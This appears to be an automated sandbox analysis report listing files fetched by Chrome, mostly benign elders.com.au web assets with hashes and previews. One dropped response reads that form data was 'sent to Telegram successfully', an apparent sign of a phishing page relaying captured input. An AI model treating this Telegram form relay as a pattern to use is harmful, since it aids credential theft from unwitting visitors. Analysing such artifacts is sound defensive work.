                                                                                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:JSON data
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):1711
                                                                                                                                    Entropy (8bit):5.320500352208174
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:TRM+RJvROtKHKUtKHvLNt4LNFmmUC2VWHh71Xfpc0224CVJKRxNli3yt3qyYUbtT:TpRJvRCcrc+mc28B7AR24DiQxc8yY
                                                                                                                                    MD5:829E847BC47EF3F21BA303841382841D
                                                                                                                                    SHA1:31B7C3B870F059E41327AB9A63B20C5AAD858E0C
                                                                                                                                    SHA-256:B6243FE566AEB3282DA93CF58425DF5C74FE72E259284BE4A7C398792BE1EBDF
                                                                                                                                    SHA-512:350DD2709FD6D5D5B32128BAE9C1760992A154CC2FD53FCAB7F173EAD1C7962A4481C0F30FD62E775D4AF58C5E75A82A164381F8254FAFAE6B48E8AA205C1A04
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/bin/el/local-branch?branchId=1669702755463&type=default
                                                                                                                                    Preview:[{"id":"1669702755463","title":"Elders Adelaide","pagePath":"/our-services/our-branches/sa/elders-adelaide/","location":{"state":{"path":"/content/cq:tags/el/branch/locations/sa","title":"SA","id":"el:branch/locations/sa"},"city":{"path":"/content/cq:tags/el/branch/locations/sa/fleurieu-peninsula/elders-adelaide","title":"Adelaide","id":"el:branch/locations/sa/fleurieu-peninsula/elders-adelaide"},"googleProperties":{"placeId":"ChIJFRlDGSjPsGoR5gcvCu9E1WA","latitude":"-34.92389616095354","longitude":"138.60259665582404","embedUrl":"https://www.google.com/maps/embed?pb\u003d!1m18!1m12!1m3!1d3271.301151004918!2d138.60046118650763!3d-34.92398350209179!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x6ab0cf2819431915%3A0x60d544ef0a2f07e6!2sElders!5e0!3m2!1sen!2sau!4v1669702553968!5m2!1sen!2sau","getDirectionUrl":"https://goo.gl/maps/bBNFUxbFm24iPiek7","distance":0.0}},"phoneNumbers":[{"linkText":"(08) 8425 4000","linkUrl":"+61884254000"}],"fax":[{"linkText":"(08) 8425 4954","linkUrl":"+6
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 24 x 25, 8-bit gray+alpha, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):790
                                                                                                                                    Entropy (8bit):7.290908119264289
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:Y3mua+m983KxlZBKTy3epJ2lRzRRDEMEFRI:Y3zU86lr3EAVdEO
                                                                                                                                    MD5:0C80233F7068DCFD314F03EC73BDC83A
                                                                                                                                    SHA1:E587B734EF34F975DA39DB5464888B323D52F580
                                                                                                                                    SHA-256:3AD78DBDCD7775F42FCCA4DE2CE075ABA164A30551B9342FE05800998EEEE0AD
                                                                                                                                    SHA-512:48C4CAA80FED3D5CFDD6C06EF3534D364D2EA5A413E1C77E3A70AC602978216BBD6FEDDCB4FE03D4D8CFC8777DA4651820DE9E593C21B4A632191BACC63EE2D0
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:.PNG........IHDR.............."&.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........pHYs...%...%.IR$.....tIME........E.+....IDAT8..KH.`...o.P.,... (.........B...M...+.(.-...."uQ.W...d..$.....T.M.w..G:...W...s/...4.l8...%M...gN.g...S..^lT..+.iw@..6.[....;.F.5.p..........ra..._.L.}.R....k.nD7..Vk.N...sUOTk.#....4.r..wE..X.f^..X9....>......../.r3.%..N.... .f$..v..h..E..}r..u.....RPhD.`.!!...P...,......=...t..Z.(..P..x#.y.t...~H.a.,..*-.F..{.7.....8../....za.M....*..|.+g.=A.euR@.=....f5H..p..v..L...C..fUl..1...M.I!.e K.~..J...).2f..j...[....).4F...L*.5......\..t.1}.z..y}......Q...j.....+.......%tEXtdate:create.2024-06-13T07:01:58+00:00.1.5...%tEXtdate:modify.2024-06-13T07:01:58+00:00.l.....(tEXtdate:timestamp.2024-06-13T07:02:10+00:00........IEND.B`.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2407
                                                                                                                                    Entropy (8bit):4.120800107455978
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:n/vg2rGKrPgxrL3XAeUKTkIw90vtRZpJmWkuFFB5i7AF2:ng2rGTrs9bB9qRqQ5wAF2
                                                                                                                                    MD5:81A61FA6DF91240A8C0DA8CFA1F205B7
                                                                                                                                    SHA1:4DDC78DF7F4C442C36A48ED13DE319CCD33EBCE2
                                                                                                                                    SHA-256:1DCBAB25EF09241FAABB74D0A891609A992CF8A4A51D4715FD8909EF490FB27B
                                                                                                                                    SHA-512:A4F8C7C6794CFE39004924E7A67B22044608818B2E28B7C5150748F0CB77F615279587616E9C2B8F343D256EB641A6EE4F68ADC9E447AEE99BA04763F1C6A993
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M9 7.5C9 7.36739 9.05268 7.24021 9.14645 7.14645C9.24021 7.05268 9.36739 7 9.5 7H17.5C17.6326 7 17.7598 7.05268 17.8536 7.14645C17.9473 7.24021 18 7.36739 18 7.5V16.5C18 16.6326 17.9473 16.7598 17.8536 16.8536C17.7598 16.9473 17.6326 17 17.5 17H9.5C9.36739 17 9.24021 16.9473 9.14645 16.8536C9.05268 16.7598 9 16.6326 9 16.5V14.5C9 14.3674 8.94732 14.2402 8.85355 14.1464C8.75979 14.0527 8.63261 14 8.5 14C8.36739 14 8.24021 14.0527 8.14645 14.1464C8.05268 14.2402 8 14.3674 8 14.5V16.5C8 16.8978 8.15804 17.2794 8.43934 17.5607C8.72064 17.842 9.10218 18 9.5 18H17.5C17.8978 18 18.2794 17.842 18.5607 17.5607C18.842 17.2794 19 16.8978 19 16.5V7.5C19 7.10218 18.842 6.72064 18.5607 6.43934C18.2794 6.15804 17.8978 6 17.5 6H9.5C9.10218 6 8.72064 6.15804 8.43934 6.43934C8.15804 6.72064 8 7.10218 8 7.5V9.5C8 9.63261 8.05268 9.75979 8.14645 9.85355C8.24021 9
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):772
                                                                                                                                    Entropy (8bit):4.3966498802641985
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:twdoqAulEVIO4Rh6cPWgm0R/4XcYRVdL56I7sF0S:6mqaVIOy86IAiS
                                                                                                                                    MD5:198206BDD32C90F5DE0D10D91FD81833
                                                                                                                                    SHA1:B611164EF07C0F87EE85823EC554D32540B39C08
                                                                                                                                    SHA-256:A9674747820E8FE27D55C02996B53ABEBEC5059D5D3B1EFECC6206C46C80E87B
                                                                                                                                    SHA-512:48F5AB95C937ACF7ABBE9DA03EF2E582A037A919A1AE88C7387F84C0DECD629273A0E06039F0B1CE978F021619027CAF093E796E88F4906F109BA59244C92D30
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-magnifier.svg
                                                                                                                                    Preview:<svg width="20" height="21" viewBox="0 0 20 21" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M19.0007 19.9998L12.0967 13.0958M12.0967 13.0958C12.7094 12.4942 13.1969 11.7773 13.5309 10.9863C13.8649 10.1953 14.039 9.346 14.0429 8.48739C14.0468 7.62878 13.8806 6.77789 13.5539 5.98388C13.2271 5.18987 12.7463 4.46846 12.1392 3.86133C11.532 3.25419 10.8106 2.77336 10.0166 2.4466C9.2226 2.11985 8.37171 1.95364 7.5131 1.95759C6.65449 1.96153 5.80517 2.13555 5.0142 2.46959C4.22322 2.80363 3.50626 3.29107 2.90473 3.90376C1.70425 5.12651 1.03516 6.77384 1.04304 8.48739C1.05091 10.2009 1.73511 11.842 2.94677 13.0537C4.15844 14.2654 5.79956 14.9496 7.5131 14.9575C9.22664 14.9653 10.874 14.2962 12.0967 13.0958V13.0958Z" stroke="#3D3E42" stroke-width="2"/>.</svg>.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 152 x 66, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2918
                                                                                                                                    Entropy (8bit):7.907716853116308
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:g/6on79OskwFLow7j3R2/wsq90BcZzPnwbD5R4ilCJHd3zXS0dtd+jzOcLnd:gSLstFEwn0/xqqBctobQiUHd3zXSg+jn
                                                                                                                                    MD5:AED2CCE0BEA27C8E648B826838FF36DB
                                                                                                                                    SHA1:2D7713543D84113EBEA24D61653224560A9DF1E2
                                                                                                                                    SHA-256:748181DAB74B0ED8BA83CE218F97B0F1B325C2C61560C5CB8AE76EE26DEAC339
                                                                                                                                    SHA-512:A4D2E71883E22331A7B3C5EC4883C6E311D63854F2A11A5CA76667F9C51DC826F9A48F2834D2ABB5C4FE5181A7807319B474EDD1ED34C35D2DEDA3154FA715B0
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:.PNG........IHDR.......B......g.h....pHYs.................sRGB.........gAMA......a.....IDATx..m.\....l.mR.}i.H.Mw.".._4.....-..F.*..*XP..-...b.Ei...]!.E.4.C.......|qcPL..fU..l.a...9.;...2..nv..fgg.......s....|..zy..<..C|...B.p..fA.#...<.X,...>..J%........u_..;V....h..L0!W.<}t.ww./.....@.~..j......H..vJ......~...u..'.`..l.....'o.Q..Y`..........uO.._98d....j.Xl......?...r..&...#...r.#.C.p.s...`.....!W|O].hjY....T.w.8..f.f5..Jnk.....$j.$T..6....,z......x.$.w....C.1..v...u7..;n.$S..ld....o.~_r...Z..YC0......H.p.c....b......B.Sj.z.0.......E.eI;U...7....%...PW?......C...y.R.x|....*.......T....O?...~ j..;.Vs.3F.4..pG.M.UW..hm...=K$....'...P..(.';.....|...Z....W...K.E.......\..t....?"*....M2.. l.F.......Q...k......5..\.doO7.a..Q.B.Mfl.EK.g.....\E......~0..z`#..)r}.gn.F.......y.....Xr.....N..U+..O....dG9..k.R..3....Y..fR...@..0..M.o^..!.h8...........&...!W..&....ym....75..p#....^...r..wT.........%yLy.s..k.\6r..E......j....c.0~!I.5H.;,...o~gL.m...D.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):437
                                                                                                                                    Entropy (8bit):7.209188484403921
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:6v/74/6Ts/whG2m9i7mtJT4RWbKwys5fmBwKRApTjG8Nw5DcF7:x/6O87+ThKwd5uBVR+j3CM
                                                                                                                                    MD5:718699785E49839E7D63CAFDDBF2F469
                                                                                                                                    SHA1:C1C2259187A940868B282B8A6CC3C126D60E1F53
                                                                                                                                    SHA-256:5A4AC3FA5B56A020D0AA16E532DFA437F1FA0BFD8DD476762C2E8EAA763F1D68
                                                                                                                                    SHA-512:AEF07610A6D4680CB4DC5105985AD1463D5414B7EEAE46FB39B19B47807C68E562CF291D548FEC9AD5D34B8E6E42AA617DD7FD0315D7FD6EA917994DACAC5604
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:.PNG........IHDR..............w=.....pHYs.................sRGB.........gAMA......a....JIDATx..1N.A....V..&.`.....'...7..N..G..[p.T .CK5..!...[.J.2.i._3/.?.eg...{J.u.eYZ..]0#%.......o...2....z..X...c..<..Q.;.t'....Z.+..G..C...9"....w.X..YP..H_..P.R.!+..?....(..i.2...^{..0...r.\j.?.e.$(...cy#@^.=@ .=..z.Z......&.h.].sW....l'.k..B0..{ ...Z.h.H.?.N.O..w.Kf..^?......`...d2|.xp.i..l.......L7]WI..3.yE.A...g|...r.4..$....IEND.B`.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):72130
                                                                                                                                    Entropy (8bit):5.606238239604008
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:bfu0/93VQ/kdM5WoSwQCV7nh7lI2ibrrc6uFYk/xIDJCOqmqM1AmLMF4Ld2wPECS:Tu0/93QWFZyptL
                                                                                                                                    MD5:91D20120E7FE55850F031200600F53AE
                                                                                                                                    SHA1:93E3313248FF84E43025EB243AE964AF730A0BC3
                                                                                                                                    SHA-256:9F46BB6E66AFE1B40CC7E1FB7DE4A38E5D6FB27C4BDA7B986B0469817055A299
                                                                                                                                    SHA-512:7E2219E7438984160733B0B01711373596C4D483AFA78742BC21D24EF71D051F0B72B97BCEB37DBC976907797B6E900241ECD2D01EEA61BD2C7FFCCABC256325
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://cdn.mouseflow.com/projects/b953cf15-e568-418d-a9cb-1ea0cf6357a5.js
                                                                                                                                    Preview:var mouseflowDisableKeyLogging = true;if(typeof mouseflow==='undefined'&&typeof mouseflowPlayback==='undefined'){(function(){var _204=false;var _193=false;var _200=[];var _196=[];var _20='https://us.mouseflow.com';function _7(_341,_151){_151=(typeof _151!=='undefined'?_151:'');if(_4.debug)console.log('MF'+(_4.includeDebugTime?' - '+_151:'')+': '+_341)}var _60=new _397(window);var _34=new _376(window);var _5=new _383(window,Math,JSON,_60);var _13=new _372(_60,_5);var _36=new _285('local',window,_5,_7);var _304=new _285('session',window,_5,_7);var _276=new _336(window);var _4=new _359(window,_36,_204,_193);_4._100();_4._208=[];_4._174=[];_4._117=[];_4._173=[];_4._419=[];_4._418=[];_4._71='b953cf15-e568-418d-a9cb-1ea0cf6357a5';_4._417=true;_4._416=false;_4._415='5242000';_4._161('appUrl',_20);var _295=new _342(window,_5,_4,_7);function _305(_0,_4,_53,_5,_13,_76,_36){var _20,_71,_7,_56;var _194='mf_liveHeatmaps';var _15;var _119=[];var _89;var _137=false;function _46(_164,_122,_176,_112){_
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):1226
                                                                                                                                    Entropy (8bit):4.647801139486787
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:tYU/dutm7ivbWXQ8N4+2NGqRB7tFHPbUla35cFsJcrEKHb:n/TWvaqR5fHTYa35cua
                                                                                                                                    MD5:5FEF43A945FA6C8242FC795D0C8DDC9D
                                                                                                                                    SHA1:752A33F4C5B89F7E2C02B5A8EE5EF6089924C392
                                                                                                                                    SHA-256:911E4F035C61ADBB2CDCE5A5C1DAAB5763DFB6C5A1880A0EEA308741CA2126C5
                                                                                                                                    SHA-512:9A4D4A6E2ED578437626727DC6231D781507103AC22F8B994A906DBFC46B30AF784B7C37DD1238FFA01122728E699DDCC56932B6436C120ED0C4231D6647AACE
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-cart.svg
                                                                                                                                    Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_8407_13472)">.<path d="M7.5 22.5C8.32843 22.5 9 21.8284 9 21C9 20.1716 8.32843 19.5 7.5 19.5C6.67157 19.5 6 20.1716 6 21C6 21.8284 6.67157 22.5 7.5 22.5Z" fill="#2A2B2D"/>.<path d="M18 22.5C18.8284 22.5 19.5 21.8284 19.5 21C19.5 20.1716 18.8284 19.5 18 19.5C17.1716 19.5 16.5 20.1716 16.5 21C16.5 21.8284 17.1716 22.5 18 22.5Z" fill="#2A2B2D"/>.<path d="M21 5.24991H4.365L3.75 2.09991C3.71494 1.92795 3.62068 1.77374 3.48364 1.6641C3.3466 1.55447 3.17546 1.49637 3 1.49991H0V2.99991H2.385L5.25 17.3999C5.28506 17.5719 5.37932 17.7261 5.51636 17.8357C5.6534 17.9453 5.82454 18.0034 6 17.9999H19.5V16.4999H6.615L6 13.4999H19.5C19.6734 13.5041 19.8429 13.4482 19.9796 13.3415C20.1163 13.2348 20.2119 13.0841 20.25 12.9149L21.75 6.16491C21.7751 6.05363 21.7745 5.93808 21.7483 5.82706C21.722 5.71604 21.6708 5.61247 21.5985 5.52424C21.5261 5.436 21.4347 5.36543 21.3309 5.3179C21.227
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 600 x 400, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):292817
                                                                                                                                    Entropy (8bit):7.991435801139438
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:6144:7pKYu/kHxtd4lfDFI5srU+JBM7kEEgmXTdr6:Oaxj4/QfEg2+
                                                                                                                                    MD5:9A5F5905DB03C7F0FEDA9C9651464F24
                                                                                                                                    SHA1:EFB3B37FF24DE6CC134E203D4BBA44DDED701E6D
                                                                                                                                    SHA-256:F5C133FE3DD199E54EAEF091900E0471B0C940DC70434235E45D2CF2A4DE9094
                                                                                                                                    SHA-512:CA37B79B64F1DC3A03DED9DE406AF15604A3B95A8A58C3755F3EA2FF5CEEFD833D888D1A37FD75E5393921C459CED026D8B8ADBE55DE6B0DF5DCE669E612DDB8
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/content/dam/eld/images/livestocknow/close_up_ram_head_horns.png
                                                                                                                                    Preview:.PNG........IHDR...X.........r5......pHYs..........+....."iTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x='adobe:ns:meta/'>. <rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>Copy of ELD2024_livestockNow_landingpage-images-template.psd - 11</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2024-09-02</Attrib:Created>. <Attrib:ExtId>c6b7f448-340c-4f65-b35f-83bbe5a978b7</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchType>2</Attrib:TouchType>. </rdf:li>. </rdf:Seq>. </Attrib:Ads>. </rdf:Description>..
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):64
                                                                                                                                    Entropy (8bit):4.112050682122861
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:3iuBMLCjEeBFBrRN8E:3iO/rn8E
                                                                                                                                    MD5:92223B57ABEDFA8AA757621735C2F036
                                                                                                                                    SHA1:AB01E79D7EB098331EB3B325199053A62AB80FDD
                                                                                                                                    SHA-256:CDC2A6A2EFFB6195726659372444D369173C3A31D193962C715D4F050D766DAC
                                                                                                                                    SHA-512:7DCB39E050ADAE65EE0D06659C98F078F36B8204EE865B8D71B5CAA60D9DF4BEF77ABEE78D9B922274EA0FEE44DFB694EA768D788C22A167B0477297AD5E7278
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:Successful sending emailForm data sent to Telegram successfully!
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:JSON data
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):2
                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                    MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                    SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                    SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                    SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/libs/granite/csrf/token.json
                                                                                                                                    Preview:{}
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):742
                                                                                                                                    Entropy (8bit):7.590595547266891
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:6v/74/6Ts/dlM5u+Y+4FJZbJ/LhxMAr4VR5y+rsvvEj5CUSqn4gYFkS:x/6yF+YzFXb5FUgyhj7Sq4FkS
                                                                                                                                    MD5:F689837001E04872E27AA17763C2FF85
                                                                                                                                    SHA1:EAED81B5AA6C21C5A021227E327300985F1E0E13
                                                                                                                                    SHA-256:53E7E3A1A0D4EDF842A4D3F28C1853E474A58013F6F54C48C631E99A3FF7DF5F
                                                                                                                                    SHA-512:5EEC37FFB309CE4411DDFE4B4CEDE8A378A7D28844FE54B70CBBC9F210F68E15925DCB0AD50A8697187003D7FD6979F793D86B3631CD7B3CFA0A881CEDB0B71D
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:.PNG........IHDR..............w=.....pHYs.................sRGB.........gAMA......a....{IDATx..U.n.@..Yo...)..p.=.4Ar. .qk....7n...h.....O.\{.U.87..P..K...^f..%R.5J.I......of..`.va=.QC.....U..4..4h..4...... &F.X...F..{.i..v.?.m...n.=..$s...D.<...~....8..V~......@... 4...p...n..QM..U..T.6.....N...&.3.I,B...En.......nl..^..OxA..O.3.@.6.^...r.7..}..`..t..oD.._..4..J.Y.h./8&*h......{.u..?wa...9..a ...FBN*k.w%9...Bz.b..y......A./N..B~..^.@X'l......../.tZ..I....g.`.A..eE..Fu....dZ.5.7..h.kg.....?......%Q.Z........"J.....T.Z{09-.S.nE.t}.}.KX...f.D..#..8#....=H.Dts...8.C&.&..#...N!g5.X*...8..@%{d.LU.%H.-...2..tS..J...<.V.V...n>}6$e..%"~.....M...y........`.S.{../?...\.....W.!B.T...AL..rC+Z........".}..V.....IEND.B`.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (32730)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):430018
                                                                                                                                    Entropy (8bit):5.371844747679136
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:751zU/u3sgauHSp0H/G3KFVbHvbQncHPGXj:jcucgauHSpnKFVbHvbQncHPO
                                                                                                                                    MD5:877956833EDC7A947734722C9A3BBB84
                                                                                                                                    SHA1:D2703300A2084FBCF3D596FBCC0C4A6007AD2BA3
                                                                                                                                    SHA-256:34BAB527C6284CA8AD76C206BD6BDCE43E7A587652A544F7D673542B266B1CFC
                                                                                                                                    SHA-512:4DF7ED6845552642CB79F956278150FFD71DBB85E8558919DC3144C6CEEE569DCADEA9BBD93719FC21697622FCF4741E63EACD696A6A7737BB2CC79B7B08CA5D
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:// For license information, see `https://assets.adobedtm.com/728d44811931/14db0b582053/launch-f5e74cc94fc9.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2024-08-29T04:29:57Z",turbineBuildDate:"2024-08-22T17:32:44Z",turbineVersion:"28.0.0"},environment:{id:"EN4406273eae824fa9a4a08164ecb82367",stage:"production"},dataElements:{"Interaction Link (custom)":{forceLowerCase:!0,cleanText:!0,modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(e){if(e&&e.component&&e.component.hasOwnProperty("interactionLink"))return e.component.interactionLink}}},"DOM | Link URL":{cleanText:!0,modulePath:"core/src/lib/dataElements/domAttribute.js",settings:{elementProperty:"href",elementSelector:"#container-5cd4c0bcf1 > div > div > div > div.header--container.has-utility > div.header--utility-container > ul > li:nth-child(1) > a"}},"ACDL | branchName":{cleanText:!0,modulePath:"core/src/lib/dataElements/customCode.js",setti
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (1469)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):127970
                                                                                                                                    Entropy (8bit):4.925115282976446
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:Ia9RNAJRntn/NAJRnOgxnpSG0gRcAeex3riXk1wt+e7WRRSTlCxcj5uzmC/7+Loq:IaqJRtmJROgxnpSKAO6zkosbnxpt4
                                                                                                                                    MD5:DE3A13856264E0A5F9A3056F8DCA43C3
                                                                                                                                    SHA1:D68605671A8ADDC598D7F4DAF79FBCD24147EF74
                                                                                                                                    SHA-256:DA9643FD1EAFC7B888626B51CD2275426E74088B59C2562746D4F3F1A12DF3C0
                                                                                                                                    SHA-512:D4D13FE3D8B4E8C7BCA2A666FBBC38B060DF41B63FB88D749CABCCC70EFC531AF1B09D5F9E402FC16A931BA0FDDC018F3BF9C0773EEB42F9AA71FD5E8F97BDFD
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-base.lc-de3a13856264e0a5f9a3056f8dca43c3-lc.min.css
                                                                                                                                    Preview:.cmp-accordion__header{margin:0}..cmp-accordion__button{display:block;width:100%;text-align:left}..cmp-accordion__panel--hidden{display:none}..cmp-accordion__panel--expanded{display:block}..cmp-tabs__tablist{display:flex;flex-wrap:wrap;padding-left:0;list-style:none}..cmp-tabs__tab{box-sizing:border-box;border-bottom:1px solid transparent;padding:.5rem 1rem;cursor:pointer}..cmp-tabs__tab--active{border-color:inherit}..cmp-tabs__tabpanel{display:none}..cmp-tabs__tabpanel--active{display:block}..cmp-carousel__content{position:relative}..cmp-carousel__item{display:none}..cmp-carousel__item--active{display:block}..cmp-carousel__action{-webkit-appearance:none;-moz-appearance:none;appearance:none}..cmp-carousel__indicators{display:flex;flex-wrap:wrap;justify-content:center;margin:0;padding:0;list-style:none}..cmp-carousel__indicator{position:relative;flex:0 1 auto;width:10px;height:10px;margin:0 7px;border-radius:50%;font-size:0;text-indent:-3000px;background-color:rgba(0,0,0,0.5)}..cmp-caro
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):510
                                                                                                                                    Entropy (8bit):4.497462332670602
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:trVmvAuCwSNxLXOO5NJLsZlHkrZMzP8hpGcq+:tZm4uaNUTGMrBcq+
                                                                                                                                    MD5:73B4C1811F61B251388096354D1F301A
                                                                                                                                    SHA1:D8392C6B64CDA5BD49D9317693B623E3CB9DAE50
                                                                                                                                    SHA-256:2E81C317E3C07984BDE4B9377CC1E341E2368FB2E73A7E008C099D0BEB2F258F
                                                                                                                                    SHA-512:7D377F12A7BC974B1E8D131183D3FBBB3595C57BA17601C96D0DEB447D283A85281872B82B7797C5D6D7D13F72DF4A96FBB4A6896CBF2E7CF992C456EFC639FC
                                                                                                                                    Malicious:false
